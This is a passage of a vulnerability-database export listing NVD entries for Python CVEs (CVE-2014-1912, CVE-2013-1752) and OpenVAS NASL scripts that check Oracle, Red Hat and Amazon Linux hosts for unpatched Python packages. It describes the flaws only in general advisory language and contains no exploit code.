"cpe:/a:python:python:2.6.8", "cpe:/a:python:python:3.0.1", "cpe:/a:python:python:2.5.1", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:2.5.6", "cpe:/a:python:python:2.7.1150", "cpe:/a:python:python:3.1.1", "cpe:/a:python:python:2.5.2", "cpe:/a:python:python:3.2", "cpe:/a:python:python:2.7.2150", "cpe:/a:python:python:3.2.0", "cpe:/a:python:python:3.1.2", "cpe:/a:python:python:2.7.6", "cpe:/a:python:python:2.6.5", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:3.3.3", "cpe:/a:python:python:2.6.2", "cpe:/a:python:python:3.3.0", "cpe:/a:python:python:3.1", "cpe:/a:python:python:2.6.6", "cpe:/a:python:python:2.6.7", "cpe:/a:python:python:2.5.3", "cpe:/a:python:python:2.7.4", "cpe:/a:python:python:2.7.2", "cpe:/a:python:python:3.0", "cpe:/a:python:python:3.2.2", "cpe:/a:python:python:3.2.1", "cpe:/a:python:python:2.6.2150", "cpe:/a:python:python:3.2.3", "cpe:/a:python:python:2.5.150", "cpe:/a:python:python:3.3.2", "cpe:/a:python:python:3.3", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:3.1.3", "cpe:/a:python:python:3.4", "cpe:/a:python:python:3.1.5", "cpe:/a:python:python:2.6.4", "cpe:/a:python:python:3.2.4", "cpe:/a:python:python:2.6.1", "cpe:/a:python:python:3.1.2150", "cpe:/a:python:python:3.1.4", "cpe:/a:python:python:3.2.5", "cpe:/a:python:python:2.5.4", "cpe:/a:python:python:3.2.2150", "cpe:/a:python:python:3.3.1", "cpe:/a:python:python:2.6.6150"], "id": "CVE-2014-1912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1912", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:python:python:2.7.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.6150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.5.150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.2150:*:*:*:*:*:x64:*", "cpe:2.3:a:python:python:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:x64:*", "cpe:2.3:a:python:python:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2:alpha:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.4:alpha1:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.5.2:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:58", "description": "** REJECT ** Various versions of Python do not properly restrict readline calls, which allows remote attackers to cause a denial of service (memory consumption) via a long string, related to (1) httplib - fixed in 2.7.4, 2.6.9, and 3.3.3; (2) ftplib - fixed in 2.7.6, 2.6.9, 3.3.3; (3) imaplib - not yet fixed in 2.7.x, fixed in 2.6.9, 3.3.3; (4) nntplib - fixed in 2.7.6, 2.6.9, 3.3.3; (5) poplib - not yet fixed in 2.7.x, fixed in 2.6.9, 3.3.3; and (6) smtplib - not yet fixed in 2.7.x, fixed in 2.6.9, not yet fixed in 3.3.x. NOTE: this was REJECTed because it is incompatible with CNT1 \"Independently Fixable\" in the CVE Counting Decisions.", "edition": 2, "cvss3": {}, "published": "2019-06-03T20:15:00", "title": "CVE-2013-1752", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2013-1752"], "modified": "2019-06-03T20:15:00", "cpe": [], "id": "CVE-2013-1752", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1752", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "openvas": [{"lastseen": "2019-05-29T18:35:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "description": "Oracle Linux Local Security Checks ELSA-2015-1330", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123066", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123066", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1330", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1330.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123066\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:55 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1330\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1330 - python security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1330\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1330.html\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.6.6~64.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.6.6~64.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.6.6~64.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-test\", rpm:\"python-test~2.6.6~64.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.6.6~64.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.6.6~64.0.1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-07-23T00:00:00", "id": "OPENVAS:1361412562310871404", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871404", "type": "openvas", "title": "RedHat Update for python RHSA-2015:1330-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for python RHSA-2015:1330-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871404\");\n script_version(\"$Revision: 12380 $\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-23 06:25:42 +0200 (Thu, 23 Jul 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for python RHSA-2015:1330-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes, users\nare directed to the referenced article on the Red Hat Customer Portal.\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement.\");\n script_tag(name:\"affected\", value:\"python on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:1330-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-July/msg00023.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1495363\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.6.6~64.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-debuginfo\", rpm:\"python-debuginfo~2.6.6~64.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.6.6~64.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.6.6~64.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.6.6~64.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:58:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7185", "CVE-2013-1752", "CVE-2014-4650"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-12-15T00:00:00", "id": "OPENVAS:1361412562310120611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120611", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-621)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120611\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-12-15 02:51:23 +0200 (Tue, 15 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-621)\");\n script_tag(name:\"insight\", value:\"An integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control those arguments could use this flaw to disclose portions of the application memory or cause it to crash.It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.It was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose source of scripts in the cgi-bin directory.\");\n script_tag(name:\"solution\", value:\"Run yum update python26 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-621.html\");\n script_cve_id(\"CVE-2014-7185\", \"CVE-2013-1752\", \"CVE-2014-4650\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python26-test\", rpm:\"python26-test~2.6.9~2.83.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python26-tools\", rpm:\"python26-tools~2.6.9~2.83.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python26-debuginfo\", rpm:\"python26-debuginfo~2.6.9~2.83.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python26-libs\", rpm:\"python26-libs~2.6.9~2.83.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python26-devel\", rpm:\"python26-devel~2.6.9~2.83.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python26\", rpm:\"python26~2.6.9~2.83.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "Oracle Linux Local Security Checks ELSA-2015-1064", "modified": "2019-03-14T00:00:00", "published": "2016-02-05T00:00:00", "id": "OPENVAS:1361412562310122870", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122870", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1064", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1064.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122870\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 14:01:39 +0200 (Fri, 05 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1064\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1064\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1064.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-1912\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~20.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"python27\", rpm:\"python27~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python\", rpm:\"python27-python~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-debug\", rpm:\"python27-python-debug~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-devel\", rpm:\"python27-python-devel~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-libs\", rpm:\"python27-python-libs~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-pip\", rpm:\"python27-python-pip~1.5.6~5.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-setuptools\", rpm:\"python27-python-setuptools~0.9.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-simplejson\", rpm:\"python27-python-simplejson~3.2.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-test\", rpm:\"python27-python-test~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-tools\", rpm:\"python27-python-tools~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-python-wheel\", rpm:\"python27-python-wheel~0.24.0~2.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-runtime\", rpm:\"python27-runtime~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-scldevel\", rpm:\"python27-scldevel~1.1~17.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python27-tkinter\", rpm:\"python27-tkinter~2.7.8~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:00:44", "bulletinFamily": "scanner", 